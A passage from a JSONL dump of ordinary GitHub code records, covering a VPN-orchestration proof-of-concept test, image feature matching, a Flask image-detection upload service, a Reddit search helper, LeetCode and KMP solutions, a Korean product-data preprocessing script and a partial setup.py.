trigger= \"cp /home/oscarcillo/example/cert.py /home/CNSMO/ENVS/cert_123/cert.py && python cert.py\",\n resources = [],\n dependencies=[],\n endpoints=[{\"uri\":\"http://127.0.0.1:9091/dh/\",\n \"driver\":\"REST\",\n \"logic\":\"get\",\n \"name\":\"get_dh\"}])\n\n\n service = Service()\n service.objectify(**d)\n return service\n\n\ndef main():\n \"\"\"\n This is the second proof of concept of the CYCLONE CNSMO architecture\n The idea is the following:\n :We have a distributed system state, which is actually implmemented.\n :We also have the VPN Manager which is a kind of orchestrator for different services\n :the credentialManager service represents the entity that will provide the config files and stuff\n :The Server is meant to be the service that will deploy the VPN server daemon\n\n the credential and server services are both configured with a basic bash deployer. 
That means\n that any launched app in that service, will be spawned via bash.\n For simplicity this PoC just launches to python REST servers that only respond with dummy responses.\n :return:\n \"\"\"\n #Configuring the System State Manager, it listen to new services\n system_state = SystemStateFactory.generate_system_state_manager(\"localhost:6379\")\n t = threading.Thread(target=system_state.start)\n t.start()\n time.sleep(1) #Sleeping for synchronization\n\n #The bash deployer to be used by the Server and the credential manager\n bash_deployer = BashDeployer(None)\n\n #Configuring the VPN Orchestrator in a different Thread to make things feel real\n vpn = VPNManager(\"localhost:6379\")\n t2 = threading.Thread(target=vpn.start)\n t2.start()\n time.sleep(1) #Sleeping for synch\n\n #At this point the VPN Manager is advertising himself to the SystemState,\n #There is a Main topic called Discovery.\n #By default the VPN Orchestrator is susbcribed to Client, Server and Credential MAnager Topics\n\n\n #Configuring the Server Manager\n server = CNSMOManager(\"localhost:6379\", \"server_123\", \"Server\", bash_deployer, None)\n\n #Configuring the Credential Manager\n credential = CNSMOManager(\"localhost:6379\", \"cert_123\", \"CredentialManager\", bash_deployer, None)\n\n #Launching the server in another thread to make things feel real\n t3 = threading.Thread(target=server.start)\n t3.start()\n time.sleep(1)\n\n #Launching the credential manager in a different thread to make things feel real\n t4 = threading.Thread(target=credential.start)\n t4.start()\n time.sleep(1)\n\n #Now we simulate that we are composing a server service for the ServerManager\n server.compose_service(**get_server_app_request().dictionarize())\n #...And launch it\n server.launch_service(\"server_123\")\n time.sleep(0.5)# Again, for synch, this is just to help to read the logs in the correct order\n\n\n #Let's compose a service for the credential manager as well\n credential.compose_service(**get_cert_app_request().dictionarize())\n #...And of course, launch it\n credential.launch_service(\"cert_123\")\n\n #We sleep here in order to let the servers spawn correctly...\n time.sleep(0.5)\n #to finally deploy the VPN...\n vpn.deploy()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"dana-i2cat/cnsmo","sub_path":"src/test/python/cnsmo/poc/pocv2.py","file_name":"pocv2.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"12919138957","text":"import torch\nfrom torchvision import transforms\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom .models import get_conv4_model\nfrom os.path import join, splitext, isfile\nfrom os import listdir\nfrom PIL import Image\n\nfrom .ransac import Ransac\n\n\nclass FeatureMatching:\n def __init__(self, model):\n self.strideNet = 16\n self.minNet = 16\n self.base = 20\n self.model = model\n\n def rescale_image(self, I, featMax, featMin=1):\n w, h = I.size\n ratio = float(w) / h\n if ratio < 1:\n feat_h = featMax\n feat_w = max(round(ratio * feat_h), featMin)\n\n else:\n feat_w = featMax\n feat_h = max(round(feat_w / ratio), featMin)\n resize_w = (feat_w - 1) * self.strideNet + self.minNet\n resize_h = (feat_h - 1) * self.strideNet + self.minNet\n\n return resize_w, resize_h\n\n def multi_scale_resize(self, image, feature_sizes):\n images = list()\n for size in feature_sizes:\n w, h = self.rescale_image(image, size)\n images.append(image.resize((w, h)))\n return images\n\n @staticmethod\n 
def normalize(vec, axis, eta=1e-7, is_tensor=False):\n if is_tensor:\n return vec.div(torch.norm(vec, p=2, dim=axis).detach() + eta)\n else:\n return vec / (np.linalg.norm(vec, ord=2, axis=axis, keepdims=True) + eta)\n\n @staticmethod\n def get_sizes(base, abs_range, step=1, scale_type=\"affine\"):\n if scale_type == \"log\":\n feature_sizes = [int(base * 2 ** (i / abs_range)) for i in range(-abs_range, abs_range + 1, 1)]\n else:\n feature_sizes = [base + step * i for i in range(-abs_range, abs_range + 1, 1)]\n return feature_sizes\n\n @staticmethod\n def get_2d_idx(i, width):\n w = i % width\n h = i // width\n return w, h\n\n def compute_multi_scale_descriptors(self, images, feature_sizes):\n descriptors = list()\n preprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n if torch.cuda.is_available():\n self.model.to('cuda')\n self.model.eval()\n with torch.no_grad():\n print(\"Computing descriptors...\")\n for image in tqdm(images):\n rescaled_images = self.multi_scale_resize(image, feature_sizes)\n cur_features = list()\n for cur_img in rescaled_images:\n inp_tensor = preprocess(cur_img).unsqueeze(0)\n if torch.cuda.is_available():\n inp_tensor = inp_tensor.to('cuda')\n cur_features.append(np.squeeze(self.model(inp_tensor).cpu().numpy(), axis=0))\n descriptors.append(cur_features)\n\n return descriptors\n\n @staticmethod\n def get_feats_tensors(feats1):\n return [torch.from_numpy(feat) for feat in feats1]\n\n @staticmethod\n def compute_mutual_match(feat1, feat2):\n match1 = []\n match2 = []\n similarity = []\n grid_size = []\n\n n_features, feat2H, feat2W = feat2.shape\n _, feat1H, feat1W = feat1.shape\n feat1 = FeatureMatching.normalize(feat1, axis=0, is_tensor=True).permute(1, 2, 0).view(-1, n_features)\n feat2 = FeatureMatching.normalize(feat2, axis=0, is_tensor=True).permute(1, 2, 0).view(-1, n_features)\n score = torch.mm(feat1, feat2.transpose(0, 1))\n topk0_score, topk0_index = score.topk(k=1, dim=0)\n topk1_score, topk1_index = score.topk(k=1, dim=1)\n\n index0 = torch.zeros((score.shape[0], score.shape[1])).scatter_(0, topk0_index,\n topk0_score)\n index1 = torch.zeros((score.shape[0], score.shape[1])).scatter_(1, topk1_index,\n topk1_score)\n\n intersection_score = index0 * index1\n intersection = intersection_score.nonzero()\n\n for i1, i2 in intersection:\n i1 = i1.item()\n i2 = i2.item()\n w1, h1 = FeatureMatching.get_2d_idx(i1, feat1W)\n w2, h2 = FeatureMatching.get_2d_idx(i2, feat2W)\n match1.append([(w1 + 0.5) / feat1W, (h1 + 0.5) / feat1H])\n match2.append([(w2 + 0.5) / feat2W, (h2 + 0.5) / feat2H])\n similarity.append(intersection_score[i1, i2].item() ** 0.5)\n grid_size.append([1. / feat1W, 1. 
/ feat1H])\n return match1, match2, similarity, grid_size\n\n @staticmethod\n def compute_feature_matching(feats1, feat2):\n match1 = []\n match2 = []\n similarity = []\n grid_size = []\n _, feat2_h, feat2_w = feat2.shape\n for feat1 in feats1:\n feat1 = FeatureMatching.normalize(feat1, axis=0, is_tensor=True)\n match1_, match2_, similarity_, grid_size_ = FeatureMatching.compute_mutual_match(feat1, feat2)\n match1 += match1_\n match2 += match2_\n similarity += similarity_\n grid_size += grid_size_\n\n match1 = torch.from_numpy(np.array(match1))\n match2 = torch.from_numpy(np.array(match2))\n similarity = torch.from_numpy(np.array(similarity))\n grid_size = torch.from_numpy(np.array(grid_size))\n\n return match1, match2, similarity, grid_size, feat2_h*feat2_w\n\n\n\n\ndef get_file_extension(file):\n return splitext(file)[1][1:].lower()\n\n\ndef list_folder_images(folder):\n image_types = ['jpg', 'tif', 'png', 'bmp']\n return [join(folder, f) for f in listdir(folder) if (isfile(join(folder, f)) and (get_file_extension(f) in image_types))]\n\n\ndef get_image_list(folder):\n images_path = list_folder_images(folder)\n return [Image.open(image_path).convert('RGB') for image_path in images_path]\n\n\nif __name__ == \"__main__\":\n conv4 = get_conv4_model()\n feature_matching = FeatureMatching(conv4)\n feature_sizes = feature_matching.get_sizes(20, 2)\n\n images1 = get_image_list(\"../tmp_manuscripts/P2_/illustration\")\n images2 = get_image_list(\"../tmp_manuscripts/P4_/illustration\")\n\n descriptors1 = feature_matching.compute_multi_scale_descriptors(images1, feature_sizes)\n descriptors2 = feature_matching.compute_multi_scale_descriptors(images2, feature_sizes)\n feat1 = torch.from_numpy(descriptors1[6][0])\n feats1 = [torch.from_numpy(feat) for feat in descriptors1[6]]\n feat2 = torch.from_numpy(descriptors2[5][0])\n\n #match1, match2, similarity, grid_size = feature_matching.compute_mutual_match(feat1, feat2)\n match1, match2, similarity, grid_size, feature_map_size = feature_matching.compute_feature_matching(feats1, feat2)\n ransac = Ransac()\n score, _ = ransac.get_ransac_score(match1, match2, similarity, grid_size, feature_map_size, tolerance=0.1,\n nb_iter=100,\n transformation_name=\"affine\", nb_max_iter=100)\n exit()","repo_name":"Rykoua/ImageCollation","sub_path":"IllustrationMatcher/utils/feature_matching.py","file_name":"feature_matching.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"34855203939","text":"# Code by omoknooni\n# Tensorflow Serving API\n\nfrom flask import Flask, render_template, request, Response\nfrom werkzeug.utils import secure_filename\nfrom google.cloud import storage\nfrom PIL import Image, ImageOps\n\nimport os\nimport io\nimport json\nimport uuid, traceback\nimport requests\nimport numpy as np\n\napp = Flask(__name__)\napp.config['UPLOAD_DIR'] = '/tmp/'\nTENSOR_URL = 'http://[internal docker network ip]:8501/v1/models/wowboard:predict'\n\nALLOWED_CONTENT_TYPE = {\n 'jpg':'image/jpeg',\n 'jpeg':'image/jpeg',\n 'png':'image/png',\n}\nALLOWED_EXTENSION = sorted(ALLOWED_CONTENT_TYPE.keys())\n\nBUCKET_NAME = 'wowbd-detected-img'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '/app/[gcp storage iam account json file]'\n\ndef allowed_file(filename):\n return '.' 
in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSION\n\ndef prepare_image(image, target):\n if image.mode != \"RGB\":\n image = image.convert(\"RGB\")\n image = image.resize(target)\n image = np.array(image, dtype=np.uint8)\n return image\n\n\n@app.route('/')\ndef home():\n return Response(json.dumps({'status': 'healthy'}), mimetype='application/json', status=200)\n\n# @app.route('/upload_test')\n# def upload_test():\n# return render_template('upload_test.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n if request.method == \"POST\":\n file_obj = request.files['file']\n TEMP_FILENAME = os.path.join(app.config['UPLOAD_DIR'],secure_filename(file_obj.filename))\n task_id = str(uuid.uuid4())\n dest_name = task_id + os.path.splitext(file_obj.filename)[1]\n file_obj.save(os.path.join(TEMP_FILENAME))\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(BUCKET_NAME)\n blob = bucket.blob(task_id + '/' + dest_name)\n blob.upload_from_filename(TEMP_FILENAME)\n print(f'File {TEMP_FILENAME} uploaded to {dest_name}')\n\n try:\n # preprocessing\n with open(TEMP_FILENAME, 'rb') as f:\n img_data = f.read()\n image = Image.open(io.BytesIO(img_data))\n image = ImageOps.exif_transpose(image)\n image = prepare_image(image, target=(1024,1024)) \n height, width, _ = image.shape\n origin_image = image.copy()\n\n # add axis\n image = image[np.newaxis, :, :]\n\n # detection\n image_data = json.dumps({\"signature_name\": \"serving_default\", \"instances\": image.tolist()})\n res = requests.post(TENSOR_URL, data=image_data)\n\n # extract Result\n result = res.json()[\"predictions\"][0]\n num_detections = int(result[\"num_detections\"])\n\n result['detection_scores'] = np.array(result[\"detection_scores\"], dtype=np.float32)\n result['detection_boxes'] = np.array(result[\"detection_boxes\"], dtype=np.float32)\n\n obj_index = result['detection_scores'] > 0.65\n score = result[\"detection_scores\"][obj_index] # 0.973602414\n boxes = result[\"detection_boxes\"][obj_index] # [0.302173734, 0.617861152, 0.531666338, 0.770464897]\n num_detections = obj_index.tolist().count(True)\n\n for idx, obj in enumerate(boxes):\n obj_image = origin_image[int(obj[0]*height):int(obj[2]*height),int(obj[1]*width):int(obj[3]*width)].copy()\n obj_save = Image.fromarray(obj_image)\n obj_local = os.path.join(app.config['UPLOAD_DIR'], f'obj_{idx}.png')\n obj_save.save(obj_local)\n\n #TODO : extension\n obj_blob = bucket.blob(task_id + '/' + f'obj_{idx}.png')\n obj_blob.upload_from_filename(obj_local)\n\n \n except Exception as e:\n print(traceback.print_exc())\n if res.json:\n return Response(json.dumps({'Error' : 'detection failed', 'traceback': str(res.json())[:50]}), mimetype='application/json', status=500)\n \n if num_detections:\n return Response(json.dumps({'status': 'success', 'task_id': task_id, 'num_detections': num_detections,'score': score.tolist(), 'boxes': boxes.tolist()}), mimetype='application/json', status=200)\n else:\n return Response(json.dumps({'status': 'success', 'task_id': task_id}), mimetype='application/json', status=200)\n else:\n return Response(json.dumps({'Error':'Method not allowed'}), mimetype='application/json', status=405)\n\n\nif __name__ == \"__main__\":\n # Only for debugging while developing\n app.run(host='0.0.0.0', debug=True, 
port=80)\n","repo_name":"omoknooni/wowboard-detector","sub_path":"serving/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30629795075","text":"import praw\n\ndef authenticate_reddit(credentials):\n reddit = praw.Reddit(\n client_id=credentials['client_id'],\n client_secret=credentials['client_secret'],\n password=credentials['password'],\n user_agent=f\"SemanticForum by u/{credentials['username']}\",\n username=credentials['username']\n )\n return reddit\n\ndef reddit_search(reddit, subreddit_name, query, limit):\n subreddit = reddit.subreddit(subreddit_name)\n\n search_obj = subreddit.search(query=query, sort='hot', time_filter='all')\n \n search_result = []\n for i, submission in enumerate(search_obj):\n if i < limit:\n title = submission.title\n permalink = f'https://reddit.com{submission.permalink}'\n comment_limit = 5 # arbitrary, but allowing more comments is slower and need to deal with MoreComments objects\n comments = [comment.body for comment in submission.comments[:comment_limit]]\n search_result.append({'title': title, 'permalink': permalink, 'comments': comments})\n else: break\n \n return search_result","repo_name":"micahcantor/RedditSemanticSearchFlask","sub_path":"reddit_utils.py","file_name":"reddit_utils.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18335795585","text":"class ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2, remainder=0):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n l3 = None\n current_node = l3\n\n while l1 or l2 or remainder != 0:\n sum_numbers = (l1.val if l1 else 0) + (l2.val if l2 else 0) + remainder\n\n remainder = sum_numbers // 10\n node_value = sum_numbers % 10\n\n new_node = ListNode(node_value)\n\n if not l3:\n l3 = new_node\n current_node = new_node\n else:\n current_node.next = new_node\n current_node = new_node\n\n l1 = (l1.next if l1 else None)\n l2 = (l2.next if l2 else None)\n\n return l3\n\nl1 = ListNode(10, next=ListNode(5))\nl2 = ListNode(10, next=ListNode(5))\n\nsolution = Solution()\nl3 = solution.addTwoNumbers(l1=l1,l2=l2)\n\nprint(l3)\n","repo_name":"mattiasu96/leetcoding-practice","sub_path":"Random problems/2. 
Add Two Numbers/add_two_numbers_iterative.py","file_name":"add_two_numbers_iterative.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74810068459","text":"from models.ullava import UllavaConfig, UllavaForCausalLM\nfrom models.ullava_core import UllavaCoreConfig, UllavaCoreForCausalLM\nfrom models.grounding_module import load_groundingdino_model, GroundingModule\nfrom models.tools import KeywordsStoppingCriteria, smart_resize_token_embedding, \\\n smart_special_token_and_embedding_resize, multi_modal_resize_token_embedding\n\nDEFAULT_IMG_TOKEN = ''\n\nDEFAULT_IMG_PATCH_TOKEN = \"\"\nDEFAULT_IMG_START_TOKEN = \"\"\nDEFAULT_IMG_END_TOKEN = \"\"\n\nDEFAULT_VID_PATCH_TOKEN = \"\"\nDEFAULT_VID_START_TOKEN = \"\"\nDEFAULT_VID_END_TOKEN = \"\"\n\nDEFAULT_SEG_TOKEN = '[SEG]'\nDEFAULT_TAG_START = '[tag]'\nDEFAULT_TAG_END = '[/tag]'\n\nDEFAULT_BOS_TOKEN = ''\nDEFAULT_EOS_TOKEN = ''\nDEFAULT_UNK_TOKEN = ''\nDEFAULT_PAD_TOKEN = '[PAD]'\nIGNORE_INDEX = -100\n\n\n__all__ = [\n \"UllavaConfig\",\n \"UllavaForCausalLM\",\n \"UllavaCoreConfig\",\n \"UllavaCoreForCausalLM\",\n \"GroundingModule\",\n \"load_groundingdino_model\",\n \"KeywordsStoppingCriteria\",\n \"smart_resize_token_embedding\",\n \"multi_modal_resize_token_embedding\",\n \"smart_special_token_and_embedding_resize\",\n \"DEFAULT_IMG_TOKEN\",\n \"DEFAULT_SEG_TOKEN\",\n \"DEFAULT_IMG_PATCH_TOKEN\",\n \"DEFAULT_IMG_START_TOKEN\",\n \"DEFAULT_IMG_END_TOKEN\",\n \"DEFAULT_VID_PATCH_TOKEN\",\n \"DEFAULT_VID_START_TOKEN\",\n \"DEFAULT_VID_END_TOKEN\",\n \"DEFAULT_BOS_TOKEN\",\n \"DEFAULT_EOS_TOKEN\",\n \"DEFAULT_UNK_TOKEN\",\n \"DEFAULT_PAD_TOKEN\",\n \"IGNORE_INDEX\",\n \"DEFAULT_TAG_START\",\n \"DEFAULT_TAG_END\"\n]\n\n\n\n","repo_name":"VeritasXu/u-LLaVA","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12455611751","text":"import re\nimport numpy as np\nimport pandas as pd\nimport time\nfrom tqdm import tqdm\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom pymongo import MongoClient\n\nconnection_url = ''\nconnection = MongoClient(connection_url)\n\ndb = connection.get_database('')\ncollection = db.get_collection('')\n\ncursor = collection.find()\nlist_c = list(cursor)\n\ndanawa_data = pd.DataFrame(list_c)\ndanawa_data.info()\n\n\n\n# 리뷰 데이터 제거\ndanawa_data = danawa_data.drop(danawa_data.iloc[:, [17,18,19]].columns, axis=1)\n\n# null값을 제거한 데이터프레임\ndanawa_notnull_data = danawa_data.dropna(axis=0)\ndanawa_notnull_data.info()\n\n# 전체 size의 값이 없는 데이터 제거(51개)\ndanawa_size_drop_data = danawa_notnull_data.loc[danawa_notnull_data['size'].notnull()]\ndanawa_size_drop_data.reset_index(inplace=True, drop=True)\ndanawa_size_drop_data.info()\n\n# 수납칸수 수치형으로 변환\ndanawa_size_drop_data['closet']\n\n# closet 수납칸수를 int형으로 바꾸는 함수(수납칸수가 없는경우는 0)\ndef change_closet_int(data):\n if not data:\n closet_int = 0\n elif '~' in data:\n closet_int = data.lstrip('~').rstrip('칸')\n else:\n closet_int = data.rstrip('칸')\n return int(closet_int)\ndanawa_size_drop_data['int_closet'] = [change_closet_int(i) for i in danawa_size_drop_data['closet']]\ndanawa_size_drop_data.info()\n\n\n# size변수를 를 각각 하나로 변경 \n\n# cm없애는 함수\ndef del_cm(data):\n size = data.rstrip('cm')\n return size\n\n# 잘못된 수집으로 인한 한글제거\ndef del_hangul(data): \n remove_in = '\\(.*\\)'\n hangul = '[:/\\[\\]\\(\\)가-힣+]'\n result = 
re.sub(remove_in, '', data) \n result = re.sub(hangul, '', result)\n return result.strip()\n\n# 범위로 주어진 사이즈를 범위의 가장 큰 부분으로 대체하는 함수\ndef del_range(lst):\n if lst[lst.find('~')+1] == 'x':\n lst = lst[:lst.find('~')] + lst[lst.find('~')+1:]\n else:\n lst = lst\n if '~' in lst:\n if 'x' in lst[:lst.find('~')+1]:\n range1 = lst[lst.find('x', lst.find('x')+2)+1:lst.find('~')+1]\n else:\n range1 = lst[:lst.find('~')+1]\n \n result = re.sub(range1, '', lst)\n else:\n result = lst\n \n return result\n\n# 가로*세로*높이를 각각 나누는 함수\ndef divide_size(data):\n if 'x' in data:\n division = data.split('x')\n elif '×' in data:\n division = data.split('×')\n \n return division\n\n# 사이즈를 하나의 값들로 나누는 함수\ndef divide_size2(data):\n global data2\n if 'x' in data:\n data2 = data.replace('x', ' ')\n elif '×' in data:\n data2 = data.replace('×', ' ')\n data3 = ' '.join(data2.split()).split()\n return data3\n\n# 각각의 값을 구하는 함수\ndef get_har_size(data):\n har = float(data[0])\n return har\n\ndef get_ver_size(data):\n ver = float(data[1])\n return ver\n\ndef get_hei_size(data):\n if len(data) != 2:\n hei = float(data[2])\n else:\n hei = np.nan\n return hei\n\ndanawa_size_drop_data['modified_size'] = [divide_size2(del_range(del_hangul(del_cm(i)))) for i in danawa_size_drop_data['size']]\nlist(danawa_size_drop_data['modified_size'])\n\ndanawa_size_drop_data['size_har'] = [get_har_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data['size_ver'] = [get_ver_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data['size_hei'] = [get_hei_size(i) for i in list(danawa_size_drop_data['modified_size'])]\ndanawa_size_drop_data.info()\n\n# 6개월 가격추이의 값이 존재하지 않는 3개의 데이터를 제거\ndanawa_data2 = danawa_size_drop_data.loc[danawa_size_drop_data['price_6month'].notnull()]\ndanawa_data2.info()\n\n\n# 기울기\n\n# y = 최근 minPrice - 과거 minPrice, x = 6(관측된 최근의 개월) - 1(첫달), 기울기 = y/x \n# x1 = 1, \n# x2 = len(가격추이), 만약 1이��면 기울기=0 \n# y2 = len(가격추이)의 minPrice \n# y1 = 1의 minPrice \n\n# 기울기를 가져오는 함수\ndef get_slope(x1, x2, y1, y2):\n if x2 == 1:\n result = 0\n else:\n result = (y2-y1) / (x2-x1)\n return result\n\ndef get_price_slope(data):\n x1 = 1\n x2 = len(data)\n y2 = data[x2-1].get('minPrice')\n y1 = data[0].get('minPrice')\n \n result = get_slope(x1,x2,y1,y2)\n return result\n\nget_price_slope(danawa_data2['price_6month'][0])\ndanawa_data2['price_slope'] = [get_price_slope(lst) for lst in danawa_data2['price_6month']]\n\n\n\n\n\n# 토크나이저를 통해 json값으로 돌려주는 함수\ndef get_token_json(data):\n text = data\n import requests as req\n import json\n url = ''\n body = {\n \"text\" : text,\n \"analyzer\": \"nori_korean_analyzer\",\n # \"explain\": True\n }\n headers = {\n 'Content-Type': 'application/json; charset=utf-8'\n }\n noun = req.post(url, json.dumps(body), headers = headers)\n \n return noun.json()\n\n# 데이터의 하나의 컬럼을 넣었을 때, 하나의 값당 토크나이저를 돌리고 그를 공백값으로 join해서 내보내주는 함수\ndef get_token_df(data):\n json_data = [get_token_json(i) for i in data]\n tokens_data = [i.get('tokens') for i in json_data]\n \n token_df = pd.DataFrame(columns=['data'])\n for q in range(len(tokens_data)):\n token_one = [i.get('token') for i in tokens_data[q]]\n token_df = token_df.append({'data':' '.join(token_one)}, ignore_index=True)\n final = [i.split(' ') for i in token_df['data']]\n return final\n\n\n\n# token화가 필요한 변수(info_all, with_in, form, color, function) 수정 \n# with_in 수정\ndanawa_data2['with_in'] = get_token_df(danawa_data2['with_in'])\ndanawa_data2['with_in']\n\n# form 수정\ndanawa_data2['form'] = [i.strip('형') for i in 
danawa_data2['form']]\n\n# color 수정\ndanawa_data2['color'] = get_token_df(danawa_data2['color'])\ndanawa_data2['color']\n\n# function 수정\ndanawa_data2['function'] = get_token_df(danawa_data2['function'])\ndanawa_data2['function']\n\n# info_all 수정\ndanawa_data2['info_all'] = get_token_df(danawa_data2['info_all'])\ndanawa_data2['info_all']\n\n\n# 화장대의 특성중 하나인 레일의 종류가 토크나이저로 인해 특성을 무시하고 '레일'만 남는다는 사실을 발견!! \n# -> 이부분에 대해 '레일'을 제거하고 '볼'을 남기는 방법을 택함 \n# ('볼 레일' 이런식으로 띄워도 '레일'만 인식됨)\nget_token_json(['볼', '레일'])\nget_token_json(['볼레일'])\n\n# function의 '볼레일' 수정\na = [' '.join(i).replace('레일', '') if '레일' in ' '.join(i) else i for i in danawa_data2['function']]\nb = [i.replace('레일', '') if '레일' in i else i for i in a]\nlen(b)\ndanawa_data2['function'] = get_token_df(b)\n\n# info_all의 '볼레일' 수정\na = [' '.join(i).replace('레일', \"'/ 레일\") if '레일' in ' '.join(i) else i for i in danawa_data2['info_all']]\nb = [i.replace('레일', \"'/ 레일\") if '레일' in i else i for i in a]\nlen(b)\ndanawa_data2['info_all'] = get_token_df(b)\n\n\n# 이 토큰들을 하나의 벡터로 만드는 작업\npath = './word2vec/word2vec_210813.bin'\nfrom gensim.models import Word2Vec\nmodels = Word2Vec.load(path)\n\n# token화 처리한 4개의 변수에 대해서 벡터화\nform_vector = [np.mean(models.wv[i]) for i in danawa_data2['form']]\nlen(form_vector)\n\nwith_in_vector = [np.mean(models.wv[i]) for i in danawa_data2['with_in']]\nlen(with_in_vector)\n\ncolor_vector = [np.mean(models.wv[i]) for i in danawa_data2['color']]\nlen(color_vector)\n\nfunction_vector = [np.mean(models.wv[i]) for i in danawa_data2['function']]\nlen(function_vector)\n\nfor i in danawa_data2['info_all']:\n for j in i:\n if j not in models.wv.index_to_key:\n i.remove(j)\ninfo_all_vector = [np.mean(models.wv[i]) for i in danawa_data2['info_all']]\nlen(info_all_vector)\n\n# 제조사의 경우, word2vec에서 인식하지 못하는 글자가 많고, 다르다는 구분만 존재해도 된다 생각하여 정수 인코딩 실시\nmade_by = dict(zip(list(danawa_data2.iloc[:,7].unique()), \n list(range(len(danawa_data2.iloc[:,7].unique())))))\n\n# 데이터에 추가\ndanawa_data3 = danawa_data2.copy()\n\ndanawa_data3['made_by'] = [made_by.get(i) for i in danawa_data2['made_by']]\ndanawa_data3['form'] = form_vector\ndanawa_data3['with_in'] = with_in_vector\ndanawa_data3['color'] = color_vector\ndanawa_data3['function'] = function_vector\ndanawa_data3['info_all'] = info_all_vector\ndanawa_data3.info()\n\n\n\n# 가격이 존재하지 않는 데이터(주로 일시품절로 인해 가격정보가 없음)를 제거후, 최저가를 뽑아내 변수를 하나 만듦\ndanawa_data4 = danawa_data3.loc[danawa_data3['shoppingmall_price'] != {}]\ndanawa_data4.reset_index(inplace=True, drop=True)\ndanawa_data4.info()\n\n# 최저가를 뽑아내는 함수\ndef get_min_price(data):\n value_list = list(data.values())\n price = min(value_list)\n return price\n\n\n# 최저가 변수를 넣고, 등록일자를 수치형으로 변환하여 넣음\ndanawa_data4['min_price'] = [get_min_price(i) for i in danawa_data4['shoppingmall_price']]\ndanawa_data4['register_date'] = [int(i.replace('.', '')) for i in danawa_data4['regisgter_date']]\n\n# 모든 변수를 포함한 최종 데이터셋\ndanawa_final_all_data = danawa_data4.copy()\ndanawa_final_all_data.info()\n\n# 필요한 변수만 추려낸 최종데이터셋\ndanawa_final_data = danawa_data4.drop(danawa_data4.iloc[:, [0,1,2,3,4,5,6,9,10,11,12,13,14,15,16,18]].columns, axis=1)\ndanawa_final_data.info()\n\n# 군집에 필요없는 변수 제거하고 최종 데이터셋\ndanawa_drop_data = danawa_data4.drop(danawa_data4.iloc[:, [0,1,2,3,4,5,6,8,9,14,15,16,18]].columns, 
axis=1)\ndanawa_drop_data.info()\n\n\n","repo_name":"woonooo/danawa_scarapy_project","sub_path":"04.data_preprocessing.py","file_name":"04.data_preprocessing.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11411547424","text":"import random\nimport string\n\n\ndef simple_match(target, pattern):\n assert type(target) is str and type(pattern) is str, 'wrong type'\n target_len = len(target)\n pattern_len = len(pattern)\n\n for i in range(target_len-pattern_len+1):\n position = i\n for j in range(pattern_len):\n if target[i+j] != pattern[j]:\n position = -1\n break\n if position >= 0: # 找到了对应子串\n return position+1\n\n\ndef build_next_list(pattern):\n assert type(pattern) is str, 'wrong type'\n next = [-1, 0]\n for i in range(1, len(pattern)):\n if pattern[i] == pattern[next[i]]:\n next.append(next[i]+1)\n else:\n index = next[i]\n while index != 0: # 不断分割,尝试匹配\n if pattern[i] == pattern[next[index]]:\n next.append(next[index]+1)\n break\n else:\n index = next[index]\n if index == 0: # 已没有能匹配的部分\n next.append(0)\n return next\n\n\ndef KMP(target, pattern):\n assert type(target) is str and type(pattern) is str, 'wrong type'\n next = build_next_list(pattern) # 构建next数组\n index = j = 0\n while len(pattern)+index <= len(target):\n for i in range(j, len(pattern)):\n if pattern[i] != target[index+i]:\n index += i - next[i]\n j = next[i]\n if j < 0:\n j = 0\n break\n if len(pattern) == i+1:\n return index+1 \n return None\n\n\ndef main():\n for i in range(10000):\n target = ''.join(random.sample(string.ascii_letters + string.digits, 40))\n pattern = ''.join(random.sample(string.ascii_letters + string.digits, 2))\n ans1 = simple_match(target, pattern)\n ans2 = KMP(target, pattern)\n if ans1 != ans2:\n print('target string: {}'.format(target))\n print('pattern string: {}'.format(pattern))\n print('simple_match: {}'.format(ans1))\n print('KMP: {}'.format(ans2))\n\nif __name__ == '__main__':\n main() ","repo_name":"pancerZH/algorithm_with_python","sub_path":"str_match.py","file_name":"str_match.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6577127899","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import find_packages, setup\n\nwith open(\"README.md\") as readme_file:\n readme = readme_file.read()\n\nrequirements = []\n\ntest_requirements = [\n \"pytest>=3.6\",\n]\n\nsetup(\n author=\"Samarpan Rai\",\n author_email=\"samarpan-rai@live.com\",\n python_requires=\">=3.6\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n ],\n description=\"Context manager around service provided by HealthChecks for easy use\",\n 